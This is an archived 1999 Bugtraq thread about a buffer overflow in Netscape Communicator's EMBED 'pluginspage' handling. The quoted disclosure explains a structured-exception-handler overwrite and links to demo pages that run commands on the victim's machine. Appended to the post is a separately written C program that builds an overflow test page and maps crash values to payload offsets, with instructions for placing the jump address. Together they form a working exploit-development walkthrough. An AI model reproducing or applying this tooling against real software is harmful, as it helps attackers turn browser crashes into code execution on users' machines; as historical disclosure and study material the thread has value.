Bugtraq mailing list archives

Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow


From: kerb () FNUSA COM (Kerb)
Date: Tue, 7 Sep 1999 00:40:41 -0500


I tried the URL for the notepad.exe on a Windows 95 (4.00.950a) machine,
Pentium II 266 w/ 56 MB of RAM, using Netscape Communicator 4.05 Preview
Release 1 (AWT 1.1.5), even though these are coded for Win98.  When I went
there with NC 4.05, it gave me a blue screen of death that was completely
unrecoverable.  I had to reboot the system.
So, basically, it is a DoS for Netscape users; it could possibly be coded into a
CGI or JavaScript that checks the browser version and writes the
corresponding exploit code.   Just a thought.

-Kerb

On Thursday, September 02, 1999 9:46 AM, DEF CON ZERO WINDOW
[SMTP:defcon0 () UGTOP COM] wrote:
: Hi,
:
:  I discovered a buffer overflow bug which causes a huge security hole in
:  `Netscape Communicator 4.06J, 4.5J - 4.6J, 4.61e' (probably every version
:  since 3.0).
:
:  The problem in this application is in the handling of the EMBED tag; the
:  buffer overflow is caused if a long string is specified in the "pluginspage"
:  option. I coded an exploit program to execute any command on the victim
:  machine. I tested it on Windows 98.
:
:  However, because this program specifies the address of the system()
:  function defined in msvcrt.dll directly, it does not work on Windows
:  machines that have another version of msvcrt.dll installed (this program is
:  for version 6.00.8397).
:
:  The reason I specified the immediate address of the function is that the
:  buffer the exploit code can be written to is very short: the size of the
:  writable buffer is about 83 bytes. The buffer is too small to hold code
:  that looks up the addresses of the functions defined in "msvcrt.dll".
:
:  However, this problem can be solved if code that searches for the attack
:  code and executes it is put in the exploit code. The attack code can also
:  be written to another buffer.
:
: # Attack code of 2300 bytes could be written to stack_bottom.
:
:  A trojan or virus could be written into the attack code; this problem is
:  very serious.
:
:  In this case, the stack pointer (ESP) at the time the overflow occurs
:  differs with the environment, so the method of overwriting the RET address
:  cannot be used for the exploit. This example overwrites the handler address
:  for the access violation, and the exploit code is called when the access
:  violation occurs. When the access violation occurs, the address of the
:  exploit buffer is stored in the EBX register, so I overwrite the handler
:  address with the address of code where a "JMP EBX" instruction is written.
:
:  You can quickly test this exploit on my site. I have prepared some versions
:  of the exploit that execute "welcome.exe" on your Windows 98 machine. If you
:  are a user of one of the specified versions of Netscape, please test it. I
:  did not code the exploit program for Windows NT and Windows 95, but they
:  also contain the same problem.
:
: .. and this problem can't be avoided.
:
:
: [ exploit demo page ]
:
: exec "welcome.exe" - nc4x_ex.c
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi
:
: exec "notepad.exe"
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
:
: ---
:
: [ exploit test ]
:
: blue screen(int 01h)
: http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
:
:
: [ document(japanese) ]
: http://www.ugtop.com/defcon0/hc/nc4x_ex_demo.htm
:
:
: special thanks:
: UNYUN( The Shadow Penguin Security )
: http://shadowpenguin.backsection.net/
:
:
:
: --
: : R00t Zer0 -   http://www.ugtop.com/defcon0/index.htm           :
: : E-Mail: defcon0 () ugtop com                                      :
: : --                                                          -- :
: : "HP/UX is the worst OS for the hacker..." - Mark Abene         :
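As an added example (not code from the original post, from DEF CON ZERO WINDOW, or from Kerb), the following C program produces a crash-test page of the kind linked above under "blue screen": an EMBED tag whose pluginspage attribute is overlong. Instead of a run of identical bytes it fills the attribute with a cyclic alphanumeric pattern, so that whatever 4-byte value turns up in a register, in EIP, or in the overwritten access-violation handler slot after the crash can be mapped back to the offset in the string that produced it. This is how one would measure, rather than guess, which bytes of the 83-byte writable region land where. The page layout, the 3000-byte length (chosen to cover the roughly 2300 bytes to stack_bottom mentioned in the post) and the src file name are assumptions for the test page; the real offsets for any given build must be read off the target.

```c
/* Added example, not the author's code.  Generates an HTML test page whose
 * <EMBED pluginspage="..."> attribute is filled with a cyclic pattern, and
 * maps a 32-bit value recovered from the crash back to its pattern offset.
 * Assumptions (not from the original post): 3000-byte length, src name,
 * output file name. */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Upper/lower/digit cyclic pattern ("Aa0Aa1Aa2...").  Every 4-byte window
 * is unique within the first 20280 bytes.  The string is alphanumeric only:
 * no NUL to cut a strcpy short, no '"' or '>' to end the attribute or tag.
 * Caller provides len + 1 bytes; returns the number of pattern bytes. */
size_t make_pattern(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                out[n++] = u;
                if (n < len) out[n++] = l;
                if (n < len) out[n++] = d;
            }
    out[n] = '\0';
    return n;
}

/* The 4 pattern bytes at `offset`, read as the little-endian value an x86
 * register holds after being loaded from that position.  0 if out of range. */
uint32_t pattern_dword(size_t offset, size_t patlen)
{
    if (offset + 4 > patlen) return 0;
    char *pat = malloc(patlen + 1);
    if (!pat) return 0;
    make_pattern(pat, patlen);
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | (uint8_t)pat[offset + i];
    free(pat);
    return v;
}

/* Inverse lookup: given the value seen at the fault (for instance what now
 * sits in the handler slot, or EIP), return the offset of those bytes in
 * the pattern, or -1 if the value did not come from the pattern. */
long pattern_offset(uint32_t value, size_t patlen)
{
    char needle[5];
    for (int i = 0; i < 4; i++)                 /* x86 is little-endian: */
        needle[i] = (char)((value >> (8 * i)) & 0xff); /* low byte first */
    needle[4] = '\0';
    if (strlen(needle) != 4) return -1;         /* pattern never holds NUL */
    char *pat = malloc(patlen + 1);
    if (!pat) return -1;
    make_pattern(pat, patlen);
    char *hit = strstr(pat, needle);
    long off = hit ? (long)(hit - pat) : -1;
    free(pat);
    return off;
}

/* Write the test page.  Only pluginspage carries the pattern; the src value
 * is a placeholder so the browser has a reason to consult pluginspage. */
int write_test_page(const char *path, size_t patlen)
{
    char *pat = malloc(patlen + 1);
    if (!pat) return -1;
    make_pattern(pat, patlen);
    FILE *f = fopen(path, "w");
    if (!f) { free(pat); return -1; }
    fprintf(f, "<HTML><BODY>\n"
               "<EMBED SRC=\"x.dat\" PLUGINSPAGE=\"%s\" WIDTH=1 HEIGHT=1>\n"
               "</BODY></HTML>\n", pat);
    fclose(f);
    free(pat);
    return 0;
}

int main(void)
{
    const size_t len = 3000;   /* assumption: covers the ~2300 bytes to stack_bottom */
    if (write_test_page("nc4x_pattern.html", len) != 0) return 1;
    /* Example lookup for a value read off the crash: "Aa1A" sits at offset 3 */
    printf("0x%08x is at pattern offset %ld\n",
           0x41316141u, pattern_offset(0x41316141u, len));
    return 0;
}
```

Load the generated page in the affected browser under a debugger, note the value that replaced the handler pointer (or the faulting EIP), and feed it to pattern_offset; the result is the byte offset within pluginspage that reaches that slot, which is what fixes the position of the "JMP EBX" address in the post's layout. Because the pattern is alphanumeric, any bad-character filtering by the HTML parser shows up as a lookup that returns -1 rather than as a silently shifted offset.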

